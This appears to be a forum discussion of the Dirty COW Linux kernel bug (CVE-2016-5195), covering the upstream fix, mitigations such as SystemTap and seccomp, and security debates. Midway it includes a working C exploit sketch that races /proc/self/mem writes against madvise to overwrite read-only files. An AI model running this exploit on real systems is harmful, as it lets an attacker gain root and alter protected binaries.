mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream.
This is an ancient bug that was actually attempted to be fixed once
(badly) by me eleven years ago in commit 4ceb5db9757a ("Fix
get_user_pages() race for write access") but that was then undone due to
problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
In the meantime, the s390 situation has long been fixed, and we can now
fix it by checking the pte_dirty() bit properly (and do it better). The
s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement
software dirty bits") which made it into v3.9. Earlier kernels will
have to look at the page state itself.
Also, the VM has become more scalable, and what used to be a purely
theoretical race back then has become easier to trigger.
To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
we already did a COW" rather than play racy games with FOLL_WRITE that
is very fundamental, and then use the pte dirty flag to validate that
the FOLL_COW flag is still valid.
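For reference, the core of the fix is a small helper, paraphrased here from the upstream patch (an excerpt, not standalone code; details vary slightly between stable backports):

/*
 * Paraphrased from the upstream fix: FOLL_FORCE may write through an
 * unwritable pte, but only after a COW cycle has happened (FOLL_COW)
 * and the pte is dirty -- evidence that the COW really took place.
 */
static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
{
        return pte_write(pte) ||
                ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
}

follow_page_pte() then fails a FOLL_WRITE lookup when this check fails (forcing another fault), and faultin_page() sets FOLL_COW after breaking COW instead of clearing FOLL_WRITE as the old code did.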
And for earlier kernel versions, there is a SystemTap (stap) mitigation:
1) On the host, save the following in a file with the ".stp" extension:
probe kernel.function("mem_write").call ? {
        $count = 0
}

probe syscall.ptrace {  // includes compat ptrace as well
        $request = 0xfff
}
2) Install the "systemtap" package and any required dependencies. Refer
to the "2. Using SystemTap" chapter in the Red Hat Enterprise Linux
"SystemTap Beginners Guide" document, available from docs.redhat.com,
for information on installing the required -debuginfo packages.
3) Run the "stap -g [filename-from-step-1].stp" command as root.
The link doesn't say what you say it does.
It says that Linus thinks security researchers want to prioritize security at the expense of usability, which is a different thing entirely.
First you've got to tell me what you think I'm saying. The link may not say it, but if you check the thread that link resides in you'll see it's right on topic.
The context here is set by the parent:
> That sounds like a pretty serious issue with the QA and or bug tracking process.
My comment is exactly about "bug tracking process"
Linux is not known to be a friendly upstream when it comes to widely accepted security procedures like marking security vulnerabilities as such, coordinating fixes with distribution vendors, etc.
> So I personally consider security bugs to be just "normal bugs". I don't
> cover them up, but I also don't have any reason what-so-ever to think it's
> a good idea to track them and announce them as something special. (http://yarchive.net/comp/linux/security_bugs.html)
Just look at the damn commit that fixes this vulnerability. It doesn't even say that it is a serious local privilege escalation. I saw the changelog for 4.4.26 yesterday and didn't realize it was an urgent security update until I saw the Debian bulletin later.
Yeah. "various reasons". There are only 2 commits and one is a huge vulnerability. In the mean time the fix (thus the vulnerability) was sitting in Linus' git tree for the last week because Linus doesn't believe in security vulnerabilities.
That, and that a bug is a bug is a bug. Any bug can potentially be a security vulnerability with the right approach. Thus putting people who find such bugs on a pedestal is counterproductive.
How did you prove that it's not also a security problem? Experience shows that there are often surprising ways to abuse what seems to be a benign bug to break the security of a system.
The solution is for people to stop using blockquote formatting for text and reserve it for its intended purpose of quoting code and retaining formatting.
At Appcanary, we're thinking about opening up our vulnerability database to be browsable and searchable by the public. If you're not sure which version has the patch for this vulnerability in your distro, here's what we know:
If you wanted to create a useful tool to promote yourselves, you could make something for CentOS that allows a user to apply critical security updates only. yum-security doesn't seem to work on CentOS as the repos don't have the correct metadata. Currently that requires a Satellite subscription.
Re Android: No we don't, but I'd be interested to know what we can do with Android to be helpful to you. Send me an email (max at our domain) if you want to talk more.
vulns page: yeesh that is slow. This is the first time I'm sharing our vuln pages outside of our logged-in users, and yeah, that index is definitely not ready for public consumption yet.
Some operating systems like FreeBSD and (I think) Debian have this functionality built in without the need for an external service. So it depends on what you are using. Red Hat had similar functionality as well, AFAIR.
It's probably the most serious Linux local privilege escalation ever.
Look, the Azimuth people have forgotten more about reliable exploit development than I have ever known, but, no, as stated, this is clearly not true. Not long ago, pretty much all local privesc bugs were practically 100% reliable.
What I think they mean to say is that this is unusually reliable for a kernel race.
I still think, though, that the right mental model to have regarding Linux privesc bugs is:
1. If there's a local privesc bug with a published exploit, assume it's 100% reliable.
2. In almost all cases, whether or not there's a known local privesc bug, assume that code execution on your Linux systems equates to privesc; this is doubly true of machines in your prod deployment environment.
You said it: if you are not explicitly in the business of providing external access to your machine, the privesc isn't your problem (it's a problem, and it's bad, though); it's the fact that anybody could exploit the privesc in the first place.
The point is that code execution is almost always remote root, because lots of bugs like this exist. Also: most engineers overestimate the relative value of root vs. simple inside-the-VPC code execution, which is almost always gameover anyways.
Thomas has elaborated on this a few times over the years, but to elaborate for people who weren't around for those conversations: if you can make an HTTP request from inside the firewall, which probably doesn't require root, you can pivot the attack to a variety of internal services which are not designed with security in mind. That could let you e.g. reconfigure networking appliances, grab credentials to internal or external services from DevOps-y credential stores, grab all manner of business secrets, pivot to direct SQL access to the DB laundered through e.g. internal analytics dashboards or admin tooling, etc.
Of course you care about this sort of flaw: you need as many lines of defense as possible. But if anybody can exploit it in the first place, you've already got a major security hole.
> "In almost all cases, whether or not there's a known local privesc bug, assume that code execution on your Linux systems equates to privesc; this is doubly true of machines in your prod deployment environment.
It depends. I've seen "oh well, if someone has RCE they probably have root anyway" used way too many times as an excuse to avoid defense-in-depth measures.
Those people might be right. Defense in depth is a legitimate tactic, but that's all it is, and it's often an excuse for people to waste time layering stupid stuff on top of real security controls.
ASLR, NX, and CFI would be an example of a defense in depth stack that is meaningful.
SSH, Fail2Ban, and SPA would be an example of a defense in depth stack that basically just wastes time.
I would be more comfortable with a system where I knew I had to burn the box if I lost RCE on it than I would be with a system that somehow depended on RCE not coughing up kernel, and persistence, to an attacker.
The other thing defense in depth can provide is increased attacker cost. That's why there are economically valuable DRM systems (BluRay's BD+ is an example here). All you have to do is push attacker cost across a threshold (for instance with BD+, that's keeping titles secure past the new release window) to make a defense in depth control valuable.
But if someone has a kernel exploit, probably nothing you've done for defense in depth is going to meaningfully increase costs.
> That's why there are economically valuable DRM systems (BluRay's BD+ is an example here). All you have to do is push attacker cost across a threshold (for instance with BD+, that's keeping titles secure past the new release window) to make a defense in depth control valuable.
A really good example of this is Spyro 3: the developers set up a system of overlapping checksums (which could in turn be part of the data being checksummed by other, overlapping checksums) so that it was virtually impossible to change even a single bit without failing the test. It was eventually cracked, as the check only ran at boot time (it required 10 seconds of disk access, and adding 10 seconds to every loading screen in the game would have been unacceptable), which meant it took over two months for pirates to get a crack working (unusual for the time). And since most game sales come in the first two months...
But that's really just me using this as an excuse to share a bit of technical trivia.
I'm confused, how is SSH an example of defense in depth? It is an access method. You should absolutely harden your SSH configuration. Fail2Ban is useless on a properly configured SSH server (no root, no passwords, no kerberos, only keys). Managing the keys at scale, well that is a different story.
I agree with you that ASLR, NX, and CFI are the most important system level defenses to employ.
I suspect that you're confusing fail2ban and port-knocking (or using fail2ban as a port-knocker).
The point of fail2ban is to prevent an attacker from brute-forcing your server. In a key-only config, the chances of getting brute-forced are smaller (by a few orders of magnitude) than you getting hit by an asteroid while the server also gets hit by an asteroid, so fail2ban doesn't really help.
_In theory_, the same would be true for port-knocking.
However, in practice, sshd can have security holes which a malicious scanner could exploit. And while port-knocking doesn't help against a determined attacker (it's subject to MITM and replay attacks), it does help with defense-in-depth.
That is true and a good use case for fail2ban. Useless was probably a strong word, what I really meant was of limited utility in increasing the security of the SSH service.
The main reason I use fail2ban is I got tired of the log file noise/bloat. I use key-only access on my servers already, with the key stored on a hardware token (Yubikey).
I guess the question then is why you're looking at failed auth logs. Failed auths are boring, doubly so on a key-only server. Successful auths are where the fun is at.
When I first set up fail2ban it was because I got annoyed that the machine on my desk was making regular "clunk...clunk...clunk" noises from the hard disk as it wrote another failed-auth attempt to the log every second or so...
Not entirely reasonable for all use cases. If there's a machine that you need access to from many different locations, a keyfile is more of a PITA than a long passphrase.
An HPC center (that is, lots of users coming in via ssh) I know about disabled key logins, IIRC due to some incident where an attacker had got hold of a password-less key.
Too bad that sshd can't enforce the use of password-protected keys on the server side...
You got the thing backwards. It's not "too bad that sshd can't enforce keys" of some property that happened to be missing in the key attackers got their hands on. It's "too bad the HPC center staff didn't have tools good enough to manage their servers", CFEngine and Puppet being two examples of such tools the staff missed (or didn't know how to put into use in this case).
The problem, AFAIU, was that some user had a password-less key stored on some external system (their personal home computer, for all I know). That system was hacked, and allowed the attacker to access the HPC system. I don't see how the HPC center staff getting the Puppet-gospel could have prevented that person from using a password-less key. Well, except by disabling key-based logins (which, AFAIU, they could have used Puppet/cfengine/whatever for).
My point is that in general it would be better to disable password auth and only use key based auth, but only if you could somehow guarantee that the users wouldn't do crazy things like use password-less keys. But as you can't do that on the server-side, what other options do you have?
Control-Flow Integrity.
It's a bit of the new hotness in exploit mitigation, however it's quite complicated and there are various solutions that have different advantages and disadvantages.
clang docs:
http://clang.llvm.org/docs/ControlFlowIntegrity.html
Shorter CFI: when doing codegen for calls through function pointers (which will involve indirect calls through registers), emit extra code to make sure the register being jumped to is a legit function, thus breaking ROP payloads.
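As a toy illustration (not from this thread's kernel context; the compile command assumes a clang build with LTO support), clang's forward-edge CFI instruments exactly that kind of call site:

/*
 * Build (assumption: clang with LTO):
 *   clang -flto -fvisibility=hidden -fsanitize=cfi-icall cfi_demo.c -o cfi_demo
 * With cfi-icall enabled, the indirect call below is preceded by a check
 * that "handler" really points to a function of type void(*)(const char *);
 * a pointer corrupted to point at an arbitrary gadget aborts the program
 * instead of being jumped to.
 */
#include <stdio.h>

typedef void (*handler_t)(const char *);

static void greet(const char *who) {
    printf("hello, %s\n", who);
}

int main(void) {
    handler_t handler = greet;   /* imagine this is attacker-corruptible memory */
    handler("world");            /* indirect call: the CFI check guards this site */
    return 0;
}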
It's always a matter of increasing attacker cost. I am not sure that attacking QEMU, then finding a privilege escalation on the host that can break out of SELinux is much easier than just staying in the VM, hopping through the internal network until you find a host that lets you do what you want.
Chances are what you want is "simply" access to a shared folder rather than root.
1. Most users won't be affected by all the exploits (you don't stuff all models of network cards, SCSI controllers, etc. into a VM)
2. Many deployments of QEMU (through Xen or Libvirt) are protected by AppArmor/SELinux. This would at least forbid access to /proc/self/mem but I can't say if this is enough to prevent evasion. IMO, this is likely to make the task quite harder.
To be fair, Docker now defaults to using AppArmor and seccomp too. And the defaults seem to be not completely toothless either (I had to "disable" seccomp to get things running multiple times. For example, you can't just ptrace() in a container.)
Well, another thing to keep in mind with this one in particular is that there is no way to mitigate it. grsecurity can't help with this kind of bug; nothing can. So it may not just be about the reliability of this exploit, but the fact that there's no mitigation other than updating.
It's actually sad that this is the perfect type of exploit to block with SELinux: a simple write to unauthorized files. But since no one uses the user contexts of SELinux, no one blocks this.
Your shell runs unconfined because your user role is unconfined. Any process you might start will therefore run unconfined, unless stated otherwise in a policy.
So this exploit will run unconfined and will be allowed writes everywhere on the system.
I once tried the staff_r role on a Fedora 23 system and it worked out of the box, but there were more errors and it would not be recommended for beginners.
I believe the same goes for apparmor since apparmor only defines "armor" for processes, not for users. How many use pam_apparmor today? [1]
>Your shell runs unconfined because your user role is unconfined. Any process you might start will therefore run unconfined, unless stated otherwise in a policy.
Just to clarify this, any process you start from the shell. Like the PoC exploit.
But in an actual scenario, if the exploit were launched from Firefox, or Nginx, it would run under a confined context and be prevented from overwriting most critical system files.
> Your shell runs unconfined because your user role is unconfined. Any process you might start will therefore run unconfined, unless stated otherwise in a policy.
I am actually surprised that sane and safe defaults are ignored and left to the user's discretion. Most users think Linux is secure by default.
It's interesting to see Windows going in the other direction and locking down more and more by default.
Yes, it is ironic that Windows and macOS are the desktop systems taking this route, while GNU/Linux is starting to look like the Swiss cheese that many FOSS folks used to mock the other OSes for being.
The scale is so large that kernel security has become a major discussion subject.
Well, it's an ongoing effort in Fedora too. Every release of Fedora or CentOS shows some improvement around the use of SELinux.
I only wish I had the competence to help out because I think it's a very important effort.
Sad to say, in Fedora 23 I was able to easily put my user into the staff_r role and thereby confine it. But in Fedora 24 there seem to be only three default user contexts defined. Not sure what happened, but that likely means I have to define my own user context, and then I can't know how well supported it is in the policy.
It's impossible for ordinary users to do any of this.
I agree. There have been far easier local exploits in the past. For example CVE-2006-2451, whose exploitation was quite simple and did not rely on any race condition. Also CVE-2009-2692 or CVE-2010-3049. Browsing exploit-db makes it easy to find them.
Yup, the best solution here is to make privesc ineffective via VM isolation. Privilege escalations are rampant on most operating systems, they're not worth relying on. VM isolation breaks are much rarer.
> 2. In almost all cases, whether or not there's a known local privesc bug, assume that code execution on your Linux systems equates to privesc; this is doubly true of machines in your prod deployment environment.
I think this goes for any mainstream OS, Linux is not particularly special here.
So basically, if you wouldn't give a user sudo, they shouldn't have login access at all? Certainly works for some scenarios, but not practical for many others.
It depends on why you wouldn't give a user sudo. If you're worried that they might get bored and do an immature prank, or do something ill-advised (like changing the root password, or giving sudo to someone else) and render the system insecure/inoperable/unmaintainable, you probably can give them shell access. A good example here would be giving shell access to employees or the like, if their job is aided by it. The time and effort it takes to research a privesc vuln is usually sufficient to deter them, and if it isn't, you just revoke access and fire them if they do it.
If you're worried that someone might be trying to deliberately compromise your security, you can't give that person the ability to run code on your system.
>However that's hard to do when the vast majority of kernel bugs come from vendor drivers, not the upstream Linux kernel, Stoep said.
Doesn't this actually validate Andrew Tanenbaum's argument[1] from over 25 years ago, when he said monolithic operating systems are inherently insecure and a rethink is required?
While it's true that vendor drivers living in kernel space is horrible for security... that's somewhat offtopic here. This particular bug is in the memory management system, which is one of those things that kind of has to be in the kernel. A microkernel architecture seemingly would not have helped in this particular case.
A privilege escalation in MM daemon would still allow you to write and read any user memory.
Just not kernel memory, and it couldn't execute anything not covered by memory access capabilities. For nearly all intents and purposes, it is root.
Firstly, as the MM daemon runs on its own process and is well-separated from other code, it is far easier to audit, debug and so on. Its interface is also entirely explicit. There's value in modular programming. It's far more reasonable to expect quality from such a MM daemon than the mess in a random monolith kernel.
Secondly, in seL4, physical pages are capabilities. There might be more than one MM daemon, owning separate sets of capabilities to physical pages. Security-critical memory might be managed by a MM daemon your vulnerable process has no capability to talk to.
seL4 does not have these kinds of errors. By shrinking the TCB, you make it possible to do hardcore verification. The challenge is in extending to larger systems and composition.
Yeah, not sure what happened. Somehow I ended up looking at the wrong article.
I am not very good at the theory of operating systems, but since memory management is separated from the kernel, it would have been difficult for a memory bug to impact other subsystems.
Another argument is modularity, which would have allowed better testing and hence a lower chance of bugs.
Yep, but my argument still holds true, especially in the era of IoT, where risks are now becoming physical. Bugs used to only impact people financially or emotionally, but now the risks are physical.
Those projects had to constrain themselves to having 100% of the code available, no binary libraries, and locked compiler versions.
Since the early '90s I keep hearing that it is possible to write safe C code, yet out in the real world, unless constrained by processes like MISRA-C and Frama-C (which isn't really C anymore), it never works.
The proof is the number of CVEs that get reported almost daily!
Just yesterday, while reading some papers on Cyclone, I discovered this jewel:
"OS X El Capitan v10.11.6 and Security Update 2016-004" release notes
A shame, considering Apple actually has the resources for doing a proper rebase of XNU on L4 and with actual pure microkernel multiserver architecture.
haha, that safety stuff is just training wheels. You can't delegate security. Even if you use some baby-proof "programming language", as a security engineer you still have to verify that the safety works in the condition(s) you're programming for.
Ahah, I was doing systems programming in Pascal dialects and Modula-2 before having to know C was a requirement.
Of course one always has to validate security, but with C each executable line of code is a possible exploit, which grows exponentially with the number of developers touching the code and their respective skills and UB knowledge.
CVE-2016-5195
This flaw allows an attacker with a local system account to
modify on-disk binaries, bypassing the standard permission
mechanisms that would prevent modification without an
appropriate permission set. This is achieved by racing the
madvise(MADV_DONTNEED) system call while having the page of
the executable mmapped in memory.
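A minimal sketch of that race, modeled on the public PoCs rather than the in-the-wild exploit (the target path and loop counts are placeholders; error handling omitted; build with -pthread):

/*
 * Sketch of the Dirty COW race (CVE-2016-5195), modeled on public PoCs.
 * One thread writes through /proc/self/mem into a private, read-only
 * mapping of a file the user cannot write; the other keeps discarding
 * the private COW copy with madvise(MADV_DONTNEED). If the kernel-side
 * race is lost, the write lands on the shared page-cache page instead.
 */
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

static void *map;
static size_t len;

static void *madvise_loop(void *arg)
{
    for (int i = 0; i < 10000000; i++)
        madvise(map, len, MADV_DONTNEED);   /* throw away the private copy */
    return NULL;
}

static void *write_loop(void *arg)
{
    const char *payload = arg;
    int memfd = open("/proc/self/mem", O_RDWR);
    for (int i = 0; i < 10000000; i++) {
        /* write(2) on /proc/self/mem goes through the kernel's "forced"
         * get_user_pages() path, unlike a plain store to the mapping. */
        lseek(memfd, (off_t)(uintptr_t)map, SEEK_SET);
        write(memfd, payload, strlen(payload));
    }
    return NULL;
}

int main(void)
{
    struct stat st;
    int fd = open("/etc/example-target", O_RDONLY);  /* hypothetical root-owned file */
    fstat(fd, &st);
    len = st.st_size;
    map = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0);

    pthread_t t1, t2;
    pthread_create(&t1, NULL, madvise_loop, NULL);
    pthread_create(&t2, NULL, write_loop, "overwritten");
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return 0;
}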
Excellent example of why mounting the partition with system binaries (such as /usr) read-only is a good idea. CoreOS does this.
Man, MADV_DONTNEED again? I mean, Linux's implementation is already weird (it behaves in a way counter to most other implementations of the call: you can see Bryan Cantrill's talk for the details).
Bryan, if you're reading this, it's merely because I doubt that you actually check Linux bugtrackers.
Also, GNU tail provides tail -F, which does what you want tail -f to do. There is a reason for this. I don't remember what it is, but I think the manpage talks about it.
-F vs -f: -F figures out the new inode if the file is deleted (*notify are inode-based, if you see DELETE_SELF for a file you'll never get any more events)
It's because IN_MODIFY covers both writing and truncation, so the code path for such an event has to handle both anyway.
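A small self-contained sketch of the inode-based behavior both comments describe (the watched path is just an example):

/*
 * Demonstration that an inotify watch tracks an inode, not a name.
 * Once the watched inode is deleted (IN_DELETE_SELF) or renamed away
 * (IN_MOVE_SELF), the watch falls silent -- which is why tail -F has
 * to re-open the path to pick up the new inode.
 */
#include <stdio.h>
#include <sys/inotify.h>
#include <unistd.h>

int main(void) {
    int fd = inotify_init1(0);
    int wd = inotify_add_watch(fd, "/tmp/watched",
                               IN_MODIFY | IN_DELETE_SELF | IN_MOVE_SELF);
    if (fd < 0 || wd < 0) {
        perror("inotify");
        return 1;
    }

    char buf[4096] __attribute__((aligned(8)));
    for (;;) {
        ssize_t n = read(fd, buf, sizeof buf);
        if (n <= 0)
            break;
        for (char *p = buf; p < buf + n; ) {
            struct inotify_event *ev = (struct inotify_event *)p;
            if (ev->mask & IN_MODIFY)      puts("modified (covers both writes and truncation)");
            if (ev->mask & IN_MOVE_SELF)   puts("inode renamed away");
            if (ev->mask & IN_DELETE_SELF) puts("inode deleted: this watch will produce no further events");
            p += sizeof(struct inotify_event) + ev->len;
        }
    }
    return 0;
}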
Ironically, given that you mention M. Cantrill, GNU tail does not really handle truncation properly, and gives up for almost the very case that M. Cantrill did: when the truncation doesn't decrease the size, or is very closely followed by a write that ends up not decreasing the size.
Of course, truncation is not the best way to organize writing log files in the first place. daemontools family style log management (in cyclog, multilog, et al.) starts a fresh file whenever there is a rotation, so these problems of truncation never arise.
What I was actually referring to was Cantrill's talk about tail -f on Solaris, and how he improved it (so that it at least handled some cases). He looked at the GNU behavior, and determined that truncation was noted, but nothing was done about it. This is true if you use -f. However, if you use -F, truncation is handled properly.
I know what you were referring to. It has already been hyperlinked; I had already referred to where M. Cantrill explained that he gave up; and as I have just explained, the people who wrote GNU tail gave up in the same way (for much the same reasons, I expect) and GNU tail does not handle truncation any more properly than M. Cantrill did. There's no doco, but there's commentary in the code observing the problem.
And as I then went on to explain, this whole idea of truncating one log file over and over is a poor one, and not the best way to do logging in the first place. So the fact that both M. Cantrill and the GNU people gave up should perhaps be viewed as stopping when an inferior mechanism is pushed beyond its limits.
As others have pointed out, mounting read-only wouldn't have helped here.
What would have helped:
* Block ptrace() syscall using seccomp.
* Don't mount /proc, or mount it read-only.
As I understand it, those steps would close all attack vectors for this bug.
FWIW, the Sandstorm.io sandbox blocks ptrace() and doesn't mount /proc at all, so I think the bug has never been exploitable by Sandstorm apps. (Disclosure: I am the tech lead of Sandstorm.)
I think Docker now defaults to mounting /proc read-only and blocking ptrace(), so it may mitigate this vulnerability as well, but I'm not 100% sure about that.
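To make the "block ptrace() syscall using seccomp" item concrete, here is a minimal libseccomp sketch (an illustration only, not the filter Sandstorm or Docker actually ship; assumes libseccomp is installed, link with -lseccomp):

/*
 * Minimal illustration of denying ptrace(2) with libseccomp.
 * Build: cc deny_ptrace.c -lseccomp
 */
#include <errno.h>
#include <seccomp.h>
#include <stdio.h>
#include <sys/ptrace.h>

int main(void) {
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);  /* allow everything else */
    if (!ctx)
        return 1;

    /* Make ptrace() fail with EPERM instead of reaching the kernel's ptrace code. */
    seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(ptrace), 0);
    seccomp_load(ctx);

    long r = ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    printf("ptrace returned %ld (expected -1 with EPERM)\n", r);

    seccomp_release(ctx);
    return 0;
}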
No, it's more complicated than that. You need one process to mmap a file, and then you need a second process to be writing into the first process's address space while the first process triggers the COW. You can't do it with one process attacking itself.
Update: We talked to Andy Lutomirski who was involved in reverse-engineering the original exploit and tracking down the bug. He says the code path is not triggered by regular memory writes; you have to go through ptrace() or /proc/self/mem. Details in this blog post:
Of course, if you have evidence to the contrary, we'd all like to know about it!
(You are technically correct that the writes can come from another thread rather than another process, but the important part is that it has to go through one of those interfaces.)
> Please note that this mitigation disables ptrace functionality which debuggers and programs that inspect other processes (virus scanners) use and thus these programs won't be operational.
> The in the wild exploit we are aware of doesn't work on Red Hat Enterprise Linux 5 and 6 out of the box because on one side of the race it writes to /proc/self/mem, but /proc/self/mem is not writable on Red Hat Enterprise Linux 5 and 6.
Is everyone barking up the wrong tree here?
EDIT: All of the PoCs here use ptrace() or /proc/self/mem. Why would they do that if they didn't need to?
I just talked to amluto who explained that the race can only be triggered by a write that uses the "force" flag to get_user_pages() (a kernel function). /proc/pid/mem and ptrace() do this but regular writes and process_vm_writev() do not.
This exploit doesn't write to disk at all. It's about modifying the in-memory datastructures that correspond to executables on disk in between when they're read and executed.
I don't think that prevents this error. This exploit is all about gaining read-write access to a read-only page of memory. Mounting as read-only might prevent the error, but only through extra checks of the dirty bit before pages are used (i.e. the kernel would have to check the dirty bit on every page of a read-only file to ensure the contents were not changed through an exploit).
The state of the disk and the mounting of the disk generally wouldn't matter, because the page is already being forced from read to read/write, and that has no bearing on the mounting of, or data on, the actual disk. It doesn't matter whether this data is actually flushed to the disk, as long as the kernel uses it from cache without noticing it has been changed (which it probably doesn't check regardless of read-only status).
Does this actually allow modifying the binary on disk, or just modifying the in-memory cached page? (i.e., is this a persistent attack that survives a reboot?)
Fwiw, you should never think about an OS in terms of what security features they have enabled by default. The OS is almost always designed to help the user use programs and to help programs run. Just assume it is not secure until you do an audit + lockdown yourself.
If you want a secure system by default, you should probably not use Linux. I would go with OSX or OpenBSD to start.
(And finally: mounting /usr read-only isn't actually a security feature, because if you can exec code you can run a privesc and remount /usr read-write; mounting as noexec could arguably be considered a security feature)
Gotta love the dedication, with the Dirty COW "swag" web shop and all. Though something tells me it's just a strange in-joke. Might be the prices? ($1,000 for a mouse pad... oh, really?)
It would appear that the creators of the web site are not even affiliated with the people who found or fixed the bug.
"Dirty COW is a community-maintained project for the bug otherwise known as CVE-2016-5195. It is not associated with the Linux Foundation, nor with the original discoverer of this vulnerability. If you would like to contribute go to GitHub."
Whenever I see something being sold for outrageous amounts of money (like some book on Amazon which can be bought new for $40, but some people are selling used for $1400) my first suspicion is: money laundering.
it's definitely a joke. everything in the store is overpriced, FAQ item "how can I uninstall linux" links to a video of a guy smashing a computer, etc. look at this FAQ item:
What's with the stupid (logo|website|twitter|github account)?
It would have been fantastic to eschew this ridiculousness, because we all make fun of branded vulnerabilities too, but this was not the right time to make that stand. So we created a website, an online shop, a twitter account, and used a logo that a professional designer created.
I think the author is just snarking about either branded vulnerabilities or the hype that this issue is getting. Or both?
Okay, I have no idea what to do. Not a security engineer, can't follow what this thing does but I do have a couple of VPS's running my blog and a few other things. Now maybe there's an argument that I shouldn't be doing this if I don't completely understand all the ins and outs, but what the hell, I like learning about Linux.
So my question is: is simply updating and upgrading enough to protect me from this MOST DANGEROUS BUG EVER IN THE WORLD OH MY GOD YOU'RE GOING TO END UP PART OF A BOTNET AND HURT LITTLE CHILDREN!!1!!1! Which is how this reads to even a semi-technical reader. I mean, I know my way around the command line, but I'm at a loss as to what to do here.
Since for any serious bug that's published there are very likely a dozen private or not-yet-found ones, and considering how many networked devices the Linux kernel runs on, I would really like to see a better upgrade story for Android devices and any other Linux-inside gear which doesn't have a distro package manager to apply the fix. As little as I like obstructing tech companies with more laws, especially since most laws don't understand the tech, I feel like laws are the only pressure we can hope for. This is why the abuse of IoT devices is a good thing: it will highlight how dangerous it is to slap a random Linux version in some device and never bother with updates. A fleet of smart TVs needs to be hijacked with a stalker trojan that is then used to record and later post online private moments of unsuspecting owners of always-on-standby smart TVs, Amazon Echo networked microphones, etc. It's just how the world works before it realizes the risks and does something about them.
As an engineer you can argue and plead with management not to release something for which you don't intend to provide timely updates and a well-communicated support window. Like a 2-year warranty that's prominently communicated, this would highlight to consumers that it's unsafe to use the device unless it's disconnected from the network. Just like a car that doesn't pass your local safety regulations is not allowed into public traffic.
Actually, I'm surprised modern cars do not require periodic zero-expenses-for-the-owner software updates at licensed dealerships. You can explain to a driver that tires go bad because they drove X miles and have to be paid for, but you cannot argue that software updates need to be paid for because Y days have passed since the purchase. Take the Samsung battery optimization that went wrong, where the separation layer was a tiny bit too shallow; it's fair to assume some regulation will follow for safety purposes. Similarly, networked devices, which are not (and cannot be?) microcontrollers with a mere 500 lines of code, have to be regulated in terms of software updates.
Now you may say the industry will go broke if they're required to provide upgrades, or that fewer devices will be made, but I think this will lead to consolidation of the software stack, which is mostly a good thing, as those who want to produce dozens of cheap IoT devices can do so without hiring kernel developers. It's like other industries, where cheap toy makers source materials like plastic from vendors, knowing it's safe, or create the materials following a detailed recipe which is certified.
That's assuming the distributor warranted you against vulnerabilities in their product (and I remember seeing "Distro X GNU/Linux comes with ABSOLUTELY NO WARRANTY" on every device I've used...). Forcing said warranty is preposterous.
Concerning smartphones there are so many privacy and security issues that are far easier to exploit than something that involves kernel hacking... But anyway, isn't Google rolling out security updates for Android? I use CM and I know they don't. There are projects like Replicant which provide a mostly free distribution, but I don't think they're rolling out security updates either. If you're interested maybe contact them?
Are the system (not app) updates Google releases applicable to all Android devices?
It's true that there are a high number of bugs available just in mobile browsers, which do receive Google Play updates (if you have Google Play), but viewing the underlying code as verified to be correct would be naive.
If I know that a smart phone or smart fridge will not get software updates and be substantially limited in functionality by that, I wouldn't pay more than 100 bucks for it, because I expect to buy another one in probably 14 months.
However, if the update problem would be fixed properly, I wouldn't mind paying a premium.
It seems that this isn't just laziness by the vendors but also a calculated nudge for customers to buy new appliances and gadgets even though the hardware is capable and perfectly fine. No vendor would admit to that, but this is being investigated and is called planned obsolescence. If the price reflected the artificially limited lifespan of a device, then the problem would go away, and it would just be a matter of how much of the materials get recycled.
Can someone help me better understand how this works, or perhaps point me to a decent article explaining more of the details? Most of the articles I can find just briefly explain the exploit, but not really how it works (in detail).
From looking at the example code, it seems like the general process is:
- Open some (normally un-writable) file as read-only and mmap it in to your process.
- Kick off two threads. One thread to repeatedly write to the same mmap-ed address via /proc/PID/mem and another thread to keep issuing the madvise call.
- Wait for some race condition to be (un)satisfied such that you're able to write to a cached copy of the file.
What I don’t fully understand is how the /proc/PID/mem thing works.
Here’s what I’m curious about:
1. What would happen if you tried to write to the mmap-ed region directly? Since it’s been mapped in with “PROT_READ”, does this mean that you’ll get a segmentation fault or something? From the manpage, it seems like “MAP_PRIVATE” allows it to be a COW mapping, but I don’t see how the combination of “PROT_READ” and “MAP_PRIVATE” is even valid. Unless this means that any writes to data copied from the mmap-ed region into other buffers will be COW-ed and that you can’t actually write to the mmap-ed region itself? That would make sense to me.
2. How is writing to /proc/PID/mem any different than writing through the mmap-ed region directly? Assume that you weren’t running the madvise thread. What would happen then if you tried to write to the /proc/PID/mem file? Presumably the same thing that happens if you just tried to write to the file directly…
3. Finally, how does the madvise call cause a race condition? I realize this might be a little too much to cover in a comment, but this seems like the meat of it.
Doesn't seem like it works on a $10 DigitalOcean droplet (1 vCPU) with grsec-patched 4.4.8. After running for quite some time (which I suspect a system administrator would notice) "cat foo" still outputs the same contents.
If I'm reading this correctly, it works only when there's already access to a user account on the system. So you need to have an existing vulnerability already [e.g. an untrusted user].
It will be interesting to see whether it gives new root exploits for Android, as suggested in the comments.
If one's running an LTS version of Ubuntu like 14.04 or 16.04, can one expect to get an update with the security patch for this?
I'm running Kubuntu 14.04 with the latest security updates, and I'm still on kernel version 3.13.0-98-generic.
~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty
~ $ uname -a
Linux anon-pc 3.13.0-98-generic #145-Ubuntu SMP Sat Oct 8 20:13:07 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
No idea why I haven't gotten an update to 4.x. Should I just switch to a rolling release distro like Arch to have the latest updates of everything?
It looks like my kernel updates are being held back:
~ $ sudo apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages have been kept back:
